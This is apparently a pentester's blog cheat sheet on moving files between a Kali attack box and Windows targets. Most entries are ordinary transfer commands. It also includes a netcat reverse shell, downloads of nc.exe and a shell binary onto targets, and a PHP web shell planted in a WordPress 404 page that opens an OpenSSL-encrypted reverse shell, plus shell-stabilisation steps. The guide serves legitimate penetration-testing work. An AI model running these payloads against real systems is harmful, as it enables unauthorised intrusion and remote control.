Post

Comprehensive guide to securely transferring files between Linux and Windows for pentesters and red teamers

Posted Updated
By Asif Nawaz Minhas
2 min read
Comprehensive guide to securely transferring files between Linux and Windows for pentesters and red teamers

Comprehensive guide to securely transferring files Between Linux and Windows for pentesters and red teamers

Introduction

Transferring files between Linux and Windows securely is a crucial skill for pentesters and Red Teamers. This guide provides step-by-step instructions using various methods, including encrypted transfers, ensuring you can handle different scenarios effectively and securely.

File Transfer Methods

Using Python HTTP Server

On Kali:

1

python3 -m http.server 80

On Windows Target Machine:

1

powershell -c "curl http://127.0.0.1/nc.exe" -o nc.exe

Using Netcat

On Kali:

1

nc -nvlp 1234

On Windows Target Machine:

1

.\nc.exe 127.0.0.1 1234 -e powershell.exe

Using Wget

On Kali:

1

python3 -m http.server 443

On Target Machine:

1

wget http://127.0.0.1/shell3.elf

Using PowerShell

Download plink.exe:

1

curl http://127.0.0.1/plink.exe -o plink.exe

Download another tool:

1

iwr http://127.0.0.1/nc.exe -outf .\cute.exe

Using SCP (Secure Copy Protocol)

From Linux to Windows:

1

scp file.txt [email protected]:/path/to/destination

From Windows to Linux:

1

scp [email protected]:/path/to/source/file.txt /local/destination

Using SMB (Samba)

From Linux to Windows:

1

smbclient //127.0.0.1/share -U user -c "put file.txt"

From Windows to Linux:

1

smbclient //127.0.0.1/share -U user -c "get file.txt"

Using FTP

Start FTP server on Linux:

1

python3 -m pyftpdlib -p 21

On Windows Target Machine:

1
2

ftp 127.0.0.1
# Use `put` to upload or `get` to download files.

Using HTTP with Curl on Windows

On Kali:

1

python3 -m http.server 8080

On Windows Target Machine:

1

curl http://127.0.0.1/file.txt -o file.txt

Using Rsync

From Linux to Windows:

1

rsync -avz file.txt [email protected]:/path/to/destination

From Windows to Linux:

1

rsync -avz [email protected]:/path/to/source/file.txt /local/destination

Using FTP via Netcat

On Kali:

1

nc -nlvp 9000 < file.txt

On Windows Target Machine:

1

nc 127.0.0.1 9000 > file.txt

Using Python FTP Client

On Linux:

1

python3 -m pyftpdlib -p 21

On Windows:

1
2

ftp 127.0.0.1
# Login and use `put` or `get` to transfer files.

Using Tar Over SSH

From Linux to Windows:

1

tar czf - file.txt | ssh [email protected] "tar xzf - -C /path/to/destination"

From Windows to Linux:

1

ssh [email protected] "tar czf - -C /path/to/source ." | tar xzf - -C /local/destination

Advanced Encrypted Transfers

Using OpenSSL for Secure Transfers

On Kali:

1
2

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -key key.pem -cert cert.pem -port 1337

Start the listener with:

1

sudo openssl s_server -key key.pem -cert cert.pem -port 1337

Exploit Example for File Upload and Execution

On the vulnerable page (e.g., WordPress 404 page):

1
2

this is a test
<?= system('mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:1337 > /tmp/s; rm /tmp/s'); ?>

Update the 404 page, and trigger the shell by visiting:

1

http://localhost.htb/main/wp-content/themes/twentytwenty/404.php

Stabilizing the Shell

After getting the shell:

1

/usr/bin/script -qc /bin/bash /dev/null

Press CTRL + Z, then run:

1
2

stty raw -echo; fg
# Press Enter twice to stabilize
Cheatsheets
Cheatsheets file-transfer pentesting red-team
This post is licensed under CC BY 4.0 by the author.